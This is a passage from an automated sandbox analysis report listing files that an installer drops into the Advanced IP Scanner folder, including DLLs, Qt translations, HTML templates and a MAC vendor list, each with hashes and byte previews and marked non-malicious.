Preview:	<.d....!..`...B..........Z....;.......;.......;.......;..!....;..D....O..]....[..Y^...^..0....^..U...(5......G.......H,..R...K...A...N:...r..V...F..._...^.......)d......R;...y..R.......................Z....t..+%...t..S...t..]=.....A....j......5t......@...C...H5..[O..f...0.......F....................~..3....`..8\|...e..\.......\........(. =...G...y......y......%..%...0..%;.+...../.+.......+....^.+......+....&..G.... ..G....+..H0...]..Hw9.....Hw9.....I....)..J6....n.J6......J6.....J6...Js.LD......L.b..]r.M.S..B`.R.......V....0..Wi...\J.W.T.....Z.\|..S..[f3..W..gc....@.w0K..I ..H...%.......^T...T...%..."..5....~..8... d..GQ...T../...2....7......[.......b..9.E..At.L.#..d..M$o...h.e.......l8...7....^..J...I....H......C.......T.......[u..>...S..>......3..09..l...LZ......;,.5.l..a..AV...(..y....Y....0..U.......T.......[...tb..6f......................V.......>.......P..(....UP.1V...)..R....2..W.<..a..f.~.."N......5*..1...._...^..6....5...A..........c..G..;6...cU.q.J..Q...I....;..I

C:\Program Files (x86)\Advanced IP Scanner\is-ISPPJ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1800
Entropy (8bit):	4.977566387382036
Encrypted:	false
SSDEEP:	48:ngn27UxOUZyUejUC3UCJ8UZzoUH0OUvMU70qlUQCU2DYlO:gj7Lfdk3tM/4qyMVO
MD5:	C342B5AAD7F710F39DD20641A1B3DF78
SHA1:	7C3636884EE5A170230CAD8D3B5BB875E59C8DF8
SHA-256:	A550CB4323FFBC96B8BED4E5A8F1A82E0EAAAF2987FF794DB55C7D48FB1CAFDC
SHA-512:	CEC17544EB60EB296A742AF55D010EA5D31D3DC34E9DF809B58EFA074F195FA19032C6190FEBBE801E16BDE7A18C5463E35ADC334F34ABEC7B1DFD1E0632BCF6
Malicious:	false
Preview:	<hr>..<h3 align="right" style="margin-right:2em">{name}</h3><p></p>..<table align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right"><b>......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right"><b>.... .......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right"><b>...... .......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right"><b>NetBIOS:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{user}</td><td dir="rtl" align="right"><b>........:</b></t

C:\Program Files (x86)\Advanced IP Scanner\is-J54DS.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27099
Entropy (8bit):	4.717079738585517
Encrypted:	false
SSDEEP:	384:VkPmHTZjXg+G4WYwtwYd5y+0hsnvrS+OrcNwNTbSHI8crD1aVVrcyVbTLiOG:V1TZjXg63qL4+usnve1ANMTV8crK8
MD5:	58ACBFB46226E1833250D5F5A7CE7D6E
SHA1:	5711848C2E2E5D5144B5F965A0F856611773A7F4
SHA-256:	7117B0D25A9C04FBEE7F8D5D9D3B2D0E5C1A02831B70D735EC24D9B056753A74
SHA-512:	DA918A21E0A58BB2CB84087F2B96C209A5C050DF658F1B66329489423A9AACAB6B66514863E14477A5FF8D0CBA654567E4865FE6777484029511C57BF0D9DD6A
Malicious:	false
Preview:	<.d....!..`...B..........V....;...<...;.......;.......;.. ....;..A6...O..X....[..T....^.......^..P...(5...e..G.......H,..M...K...=...N:...z..V...B..._...Y.......'.......M....y..N=.......q..............U....t..)....t..N....t..Xo.....>....j......5t......@...@U..H5..V...f...........C@.......u...........~..1h...`..5\|...e..W.......X.......... =...DI..y......y......%..#...0..#..+.......+.....B.+....B.+....v.+....%..G.......G....)..H0...XA.Hw9.....Hw9.....I....'..J6......J6......J6....P.J6...F..LD......L.b..X..M.S..>..R.......V.......Wi...W..W.T...s.Z.\|..Ok.[f3..S<.gc......w0K..Ep..H...$.......Y^...T......."..3....~..5... d..C....T..-+..2...........W.......]..9.E..>..L.#.._..M$o...\|.e.....P.l8...4....^..G...I....D......@.......PY......V...>......>......3...;..l...Ht......7..5.l..\#.AV...'M.y....U....0..Q ......P.......V]..tb..3.......................Q{......;V......LZ.(....P..1V...(l.R....0{.W.<..\..f.~..!\......2...1........^..45...5...Y......2...c..D..;6...^9.q.J..M$..I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-JQOMA.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	23348
Entropy (8bit):	5.657948878761793
Encrypted:	false
SSDEEP:	384:UmHzyMSIlmOvULptM3LeJi1od5LIBD6rNqHUIKM:UmHtllmOvULrM3LU7ZIBV
MD5:	EFD6D076AAD193007E77BFA1BB46E3DA
SHA1:	92B02FDC48FCA4BD721E5171FA9B66DA049F1CEB
SHA-256:	2AB7B0A9745CD011AD92F1EC49E1C8729A1401DEB23D1CC9180458DB386ED8F5
SHA-512:	11297FD0CB3C14EBD24A01289E24535C5E414534DCE43EEB87D2B5AFCE3B0335A9D32E4B042FF642D837FB5FA5FE4CB34AF732DCD50D8F43344D7DB592BEF925
Malicious:	false
Preview:	<.d....!..`...B..........H....;.......;.......;...s...;.......;..6....O..K....[..Gf...^..'U...^..C...(5...9..G.......H,..AX..K...3...N:......V...8..._...L.......!.......A....y..A................r......Hj...t..#....t..B<...t..J......4....j...A..5t...c..@...6...H5..I...f...'u......8....................~..)....`..-....e..J?......Je......... =...9...y......y...i..%......0...A.+.....E.+.......+....r.+......+.......G.....O.G....#q.H0...J..Hw9...5.Hw9.....I....!..J6......J6....j.J6......J6...;..LD......L.b..J..M.S..5..R.....P.V....'..Wi...I..W.T.....Z.\|..B..[f3..F0.gc......w0K..:h..H...........K....T......."..+^...~..-... d..9....T..&1..2...........Iv......N..9.E..4V.L.#..Q..M$o.....e.......l8...,....^..;...I...........6D......C.......I7..>...a..>......3..'...l...<......./..5.l..M..AV...!C.y....G....0..DP......Ck......H...tb..+.......................D.......2*......@R.(....D..1V..."B.R....(..W.<..NY.f.~..........+...1........^..,G...5..........f...c..9P.;6...O..q.J..@...I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-JVGIF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1147
Entropy (8bit):	4.784372507341765
Encrypted:	false
SSDEEP:	24:lFourZsuSd/Xqk/Hu0B10Kt5RGDz9ScReEhyv:HnrZsRhXqmHu410U2Dz9S+s
MD5:	04C416BEC9FE7DEC52E2F368353FF1F9
SHA1:	DB86325EDF8EED3639A26ED279A00EBC9208ED1E
SHA-256:	10946712CE123E177350A9D96F61B2011FFCCC90597880F256E3A24676CD4B30
SHA-512:	4069E9327ED9BE5FA81EF9A7148959B376677710D8D77CE1B247AF5065C1E7B2CC50561E47F7AEBA2DA48A8FBC79752147CCF262A8C1E6A66408ACFF07489E29
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operating system:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Manufacturer:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>User:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Date:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comments:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</center><

C:\Program Files (x86)\Advanced IP Scanner\is-KE7IL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18112
Entropy (8bit):	7.072469017642331
Encrypted:	false
SSDEEP:	384:mG1W2hWhSUA0GftpBjy6oNxll7PedGitM/:mGTgio6CJkGcG
MD5:	FDF0B4BF0214585E18EE2F6978F985B0
SHA1:	0FE247F8CCA0C04729135EE612FBFCED92D59D9D
SHA-256:	CF42C1215695579ADE1842246EC43DA9A9B28E8107957C0C340CE3BA9F689584
SHA-512:	D0A249C230520538E8C2759CC0A41444C543DABD6347C8A8231C587EBBA28905AD2DF5E5D6437881C7A02F6DE6212A719ACCA2F6D30F63F8D7A21A26921A1807
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-KEE6C.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1177
Entropy (8bit):	4.903797892947706
Encrypted:	false
SSDEEP:	24:lFoybd/suSYXqZqH0vi4cS0Kt5RGDAM9ReEhyv:HH9sRYXqYHqSS0U2DAes
MD5:	5F29203D51A1A790B22063DE29E377AC
SHA1:	C0EDB2A7108E532E66D7B730466022403C64F50D
SHA-256:	C698D74D598B66CBDA7E11B80A6179AAD54AC7CCBA7127E517E4B5AC9FF4C6CD
SHA-512:	D451ADA494D387FA540F90C4F767451463ADFA3B81416E99DE14F2FCC39DD586677E359B0151CA8892BB18F847821D7B002F00D85886909A4F01D094195A27FC
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.llapot:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.ci.s rendszer:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gy.rt.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Felhaszn.l.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T.pus:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Megjegyz.sek:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Szolg.ltat.s</center></b></td><td><

C:\Program Files (x86)\Advanced IP Scanner\is-KTCHF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	1614189
Entropy (8bit):	5.107077482480661
Encrypted:	false
SSDEEP:	49152:p68vRRbvrqg2KwYbDmEZ3xm8JfAD2MGaYP63xwZjV4yhOKktsKCA4Zsdd:A
MD5:	7B844618B571CDACB552622844639A96
SHA1:	3103E22CC3EFE0B8EEB0F8664AF250BDF3FDA7C8
SHA-256:	8AA5F53559D9EDA03150CFDADC6273365311A3293631E7E467C4E881798A7885
SHA-512:	9BB645420DF1C61E8427D7A1E97067F4CC329F7A2CDB1B1957A0F05BC064967C3294DC3AE382C352A8DBB4EBF43612883C138216A3039012D37751F2EEB8A0BC
Malicious:	false
Preview:	000009FFFFFF XEROX CORPORATION.00000AFFFFFF OMRON TATEISI ELECTRONICS CO..00000BFFFFFF MATRIX CORPORATION.00000CFFFFFF Cisco Systems, Inc.00000DFFFFFF FIBRONICS LTD..00000EFFFFFF FUJITSU LIMITED.00000FFFFFFF NEXT, INC..000010FFFFFF SYTEK INC..000011FFFFFF NORMEREL SYSTEMES.000012FFFFFF INFORMATION TECHNOLOGY LIMITED.000013FFFFFF CAMEX.000014FFFFFF NETRONIX.000015FFFFFF DATAPOINT CORPORATION.000016FFFFFF DU PONT PIXEL SYSTEMS ..000017FFFFFF Oracle.000018FFFFFF WEBSTER COMPUTER CORPORATION.000019FFFFFF APPLIED DYNAMICS INTERNATIONAL.00001AFFFFFF ADVANCED MICRO DEVICES.00001BFFFFFF Novell, Inc..00001CFFFFFF BELL TECHNOLOGIES.00001DFFFFFF Cabletron Systems, Inc..00001EFFFFFF TELSIST INDUSTRIA ELECTRONICA.00001FFFFFFF Telco Systems, Inc..000020FFFFFF DATAINDUSTRIER DIAB AB.000021FFFFFF SUREMAN COMP. & COMMUN. CORP..000022FFFFFF VISUAL TECHNOLOGY INC..000023FFFFFF ABB INDUSTRIAL SYSTEMS AB.000024FFFFFF CONNECT AS.000025FFFFFF RAMTEK CORP..000026FFFFFF SHA-KEN CO., LTD..000027FFFFFF JAPAN

C:\Program Files (x86)\Advanced IP Scanner\is-L306R.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22720
Entropy (8bit):	6.8330909328576315
Encrypted:	false
SSDEEP:	192:sYNpdkKBcyNWVghW/77l9YOCAs/nGfe4pBjSfCKZWNArXVWQ4mWuqnajMHxxBNT5:zuyNW2hWD7QA0GftpBjLKNplI663U4v
MD5:	5245F303E96166B8E625DD0A97E2D66A
SHA1:	1C9ED748763F1FF5B14B8C791A4C29DE753A96AB
SHA-256:	90A63611D9169A8CD7D030CD2B107B6E290E50E2BEBA6FA640A7497A8599AFF5
SHA-512:	AF51F341670F925449E69C4B5F0A82F4FC4EB32913943272C32E3F3F18EE43B4AFB78C0D7D2F965C1ABE6A0F3A368616DD7A4FB74D83D22D1B69B405AEF1E043
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-LNG1F.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	228904
Entropy (8bit):	6.499413249756033
Encrypted:	false
SSDEEP:	3072:5vv6tCZo5oOM7fpXiUpuF007hkeWPp4bjUAIt1zG0jvbkEV3:56tb5NM7fpXiUkFdNqB4Gt1zG0h3
MD5:	0B4816D5308825B9C24FAA83CE4CB1F0
SHA1:	0EEFEF3564356B50D5B360DC4B8D8D316C99B210
SHA-256:	F10815CB6F99FA795B69FB547BA4376A336F46BC1FA279B486A24AD96FD74525
SHA-512:	806B6B203D73D08E127365C87A9AF98811E1C93568F66DFBFAE41EE13C97AC3FE623D42BC1A1FFFE36669B14E0F4E39499EC177ECA39B7339F57E50C97B20B2B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>..._.,._.,._.,.'],._.,.2.-._.,.7.-._.,.2.-._.,.2.-._.,.2.-._.,Q2.-._.,._.,\_.,Q2.-._.,Q2.-._.,Q21,._.,._Y,._.,Q2.-._.,Rich._.,................PE..L.....%^...........!..............................a................................?\....@.............................T\..4)..x....`...............b..(....p..."..0...T...............................@............................................text............................... ..`.rdata..............................@..@.data........P.......2..............@....rsrc........`.......8..............@..@.reloc..."...p...$...>..............@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-LNMM3.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	282664
Entropy (8bit):	6.463228483563671
Encrypted:	false
SSDEEP:	6144:ktT9k1wLFm2gcPHRGmRFQZvj/HXvC8CJXNMdyHNAe17LjuEnAZwjJOIaUB547PEa:ktT+1wLFm2gcPHRGmRFQZvj/HXvC1JX4
MD5:	BA337B8D1BC9F117F7605A2B79B10064
SHA1:	9F0502A9E8FE0F34F0DB2B7F6AE31278C1A9B60C
SHA-256:	EBE2A42C21F444D1E6A404694649522E3990C8A08EC9FDD28A5C390FDC873F79
SHA-512:	277529A67E4D4EF978A5F36294F9DAECA5C0A3651BFE0F97C4912ACB3FA588D99E1874AEE224F402EF91FF0A20612A251D1CE519E366FE7712F2696DBC096206
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5P.q1..q1..q1..xI..y1...V..s1..*Y..s1...V..}1...V..{1...V..s1..p\..r1..q1...0..p\..^1..p\..p1..p\w.p1..p\..p1..Richq1..........................PE..L......]...........!....."...........(.......@......................................5.....@.........................`...p$...........@..@............4..(....P...#......T...........................h...@............@...............................text.... .......".................. ..`.rdata......@.......&..............@..@.data....1..........................@....rsrc...@....@......................@..@.reloc...#...P...$..................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-LT0AP.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1184
Entropy (8bit):	5.02025670297611
Encrypted:	false
SSDEEP:	24:lFo6jdsuSxFhXqNHidEy0Kt5RGDFE0GReEhyv:HZdsRDhXqNHidZ0U2DFE0ks
MD5:	5B2A97F16B2382930301E6C2C8BFF7A7
SHA1:	C66302E72DD2C5561D6187FA4276D78063915693
SHA-256:	EDB89B8D25039530B47B0893A14CA803CE2DAF9A2358489ED3C335595B1B79DF
SHA-512:	48C67FE96D43FE255156AA3DC94BFC8A6D57B39FC91B1CEF2B498CAC6914DBABB76CF32F193EF897182C6EACA3334D374B12AD53BC2242628E930A7B73C65BFC
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Tr.ng th.i:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>H. .i.u h.nh:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Nh. s.n xu.t:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Ng..i d.ng:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Ki.u:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Ng.y:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Nh.n x.t:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>D.ch v.</center></b></t

C:\Program Files (x86)\Advanced IP Scanner\is-M4MAQ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1149
Entropy (8bit):	4.789609676615686
Encrypted:	false
SSDEEP:	24:lFouisuSqgQXqI/HuW4/0Kt5RGDVGAk9cReEhyv:HnisRqJXqaHuWK0U2DVXk9+s
MD5:	C81043ED485CCE96CDA08A5986F04E31
SHA1:	8FD38C17A704D3FAF29FF319A86F0FD42A3FC9AA
SHA-256:	119B9E8CA8946875860D593402EF4B085FD3284AA530E757B2A3B9A4B1A0C3F4
SHA-512:	56B916FA8AE9450FBD46BDA6322DE4C9BFC1A92D23A6DA751D615E3C5677C9C2A0B3B50A61831BE7B11C57813E5DCD6122A546508A7EBEF27EE6E2EAE544BFAE
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Tjeneste</center></b></td><td><b><center>Detaljer</center

C:\Program Files (x86)\Advanced IP Scanner\is-M9T5N.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1751
Entropy (8bit):	4.952964955431726
Encrypted:	false
SSDEEP:	48:ngn27UxzUZMUejUC3UCIUZzoUH0iUvoU7wpYlUQwU2DY4IO:gjmhfd0t07cqyOoIO
MD5:	23760926BFC668193D027DB24E198051
SHA1:	FF7AC19A7113F2DAA66B20C310A09752620E6455
SHA-256:	2E4A9A21A7D3444008849936F5473F78CB4DB93E9EE0992F023767B682300635
SHA-512:	F4B91BA666141C00C2282F2DCB3D5EB75F709A8E58D4DBF8992DAF17A1F163E019D1843A3A2441F392A46E4B9397666B5AD3CC76385BA3DF6897105250506E33
Malicious:	false
Preview:	<hr>..<h3 align="right" style="margin-right:2em">{name}</h3><p></p>..<table align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right"><b>.....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right"><b>..... ....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right"><b>......: ....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right"><b>NetBIOS:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{user}</td><td dir="rtl" align="right"><b>.....:</b></td></tr>...<tr><td

C:\Program Files (x86)\Advanced IP Scanner\is-MCLOF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28507
Entropy (8bit):	4.623752380391833
Encrypted:	false
SSDEEP:	384:+SMpoU+mEzzXQeqk2clHV//QY8BjefWOUxDid8KeDO33wE4:e6DmEzzX/qk2c9V//QZevUmk
MD5:	C576730007E97DD3B8F3C46FFF0F6DDD
SHA1:	311DF6FDB52905E3FFA80494FE0E1E7534060155
SHA-256:	F01DC02F68D88631535D8010960C2F306FCF07FC69F4A8113BF1A1D70130D001
SHA-512:	427751E2D8A84878837DEE345A22CC7AA3ADB0E8B40113C39E61038444121700142F56B73536FCF9AC5D150253277390AA9BEC08B29C408089C9C04E932BE89C
Malicious:	false
Preview:	<.d....!..`...B..........[,...;.......;.......;.......;..!....;..E....O..^....[..Y....^..1....^..U...(5......G.......H,..R~..K...A...N:......V...F..._..._P......).......R....y..S.......................[....t..+k...t..S....t..]......B....j......5t......@...D...H5..[...f...1I......G................!...~..4T...`..9"...e..])......]Q.......N. =...H...y......y...Q..%..%...0..%..+.....Y.+.......+......+......+....'].G.... ..G....+..H0...]..Hw9.....Hw9.....I....)Z.J6......J6.... .J6......J6...K..LD......L.b..]..M.S..C..R.......V....1q.Wi...\..W.T.....Z.\|..T[.[f3..X8.gc....^.w0K..J...H...&i......^....T...c..."..6Z...~..8... d..H3...T../Q..2...........\:......b..9.E..B,.L.#..e-.M$o.....e.......l8...8S...^..K...I...........D.......U9......[...>......>......3..0...l...M,......;..5.l..a..AV...)..y....Z3...0..V.......T.......[...tb..7$.......)..............V.......?.......Q..(....U..1V...*@.R....35.W.<..b..f.~..".......5...1....E...^..7....5...S..........c..H..;6...c..q.J..Q...I....O..I

C:\Program Files (x86)\Advanced IP Scanner\is-MH6KB.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6708264
Entropy (8bit):	6.661851136227646
Encrypted:	false
SSDEEP:	98304:YMm4f0AN5rHUQ+P2DkVNYVBcE7hxc5Rar3v:Yb4fzN5rHUj+D5VBckhkRGv
MD5:	1FBE59E9BE0F445BB14BE02C0EE69D6F
SHA1:	98F62A873CA78E9BE7760DE0FDDEDC56FAE2505D
SHA-256:	F201494B5EBE609FF2CA7D36275B19AB645C81153417B5FF4852AD8E164E144D
SHA-512:	00A61EB5B7B412CFF8BB92157DD2330FC7729C23E82A6C9648C067581DDF91E0743EC5CF4B3D4D59EA49C7EDCDA63DBF39350A173A354EC465E3F5A5D087F24F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........#..B}..B}..B}..:.B}.+..B}../y..B}../~..B}../x..B}../\|..B}.\|/\|..B}..*\|..B}..B\|.#G}.\|/y..B}.\|/x..C}.\|/}..B}.\|/...B}..B.B}.\|/...B}.Rich.B}.........................PE..L.....%^...........!......E...".......E......0E..............................`g.......f...@.........................P.J..`..,Gb.@.....d..............@f.(.....d.\....rJ.T....................sJ......sJ.@............0E.4............................text...O.E.......E................. ..`.rdata..,....0E.......E.............@..@.data....A...0c..\....c.............@....rsrc.........d......xc.............@..@.reloc..\.....d......~c.............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-N0NN5.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24768
Entropy (8bit):	6.784463110154403
Encrypted:	false
SSDEEP:	384:vUFVhjW2hWcgbCA0GftpBjH95mnlvQyURz8te:szC8iEvU2Y
MD5:	32D7B95B1BCE23DB9FBD0578053BA87F
SHA1:	7E14A34AC667A087F66D576C65CD6FE6C1DFDD34
SHA-256:	104A76B41CBD9A945DBA43A6FFA8C6DE99DB2105D4CE93A717729A9BD020F728
SHA-512:	7DAD74A0E3820A8237BAB48F4962FE43E5B60B00F003A5DE563B4CF61EE206353C9689A639566DC009F41585B54B915FF04F014230F0F38416020E08C8A44CB4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......h....@.............................a............0...............$...<..............8............................................................................text...q........................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-NS45S.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20672
Entropy (8bit):	6.979229086130751
Encrypted:	false
SSDEEP:	384:kgq6nWm5C1W2hW7SUA0GftpBjAdlI663Um:k6nWm5CTqij66km
MD5:	AB8734C2328A46E7E9583BEFEB7085A2
SHA1:	B4686F07D1217C77EB013153E6FF55B34BE0AF65
SHA-256:	921B7CF74744C4336F976DB6750921B2A0960E8AA11268457F5ED27C0E13B2C8
SHA-512:	FD7E828F842DEABF2DCDCEA3E947DC3AA909C0B6A35C75FD64EDC63C359AB97020876E6C59AD335A2A166437FA65F57433F86C1C2FE10A34B90D15D8592FE911
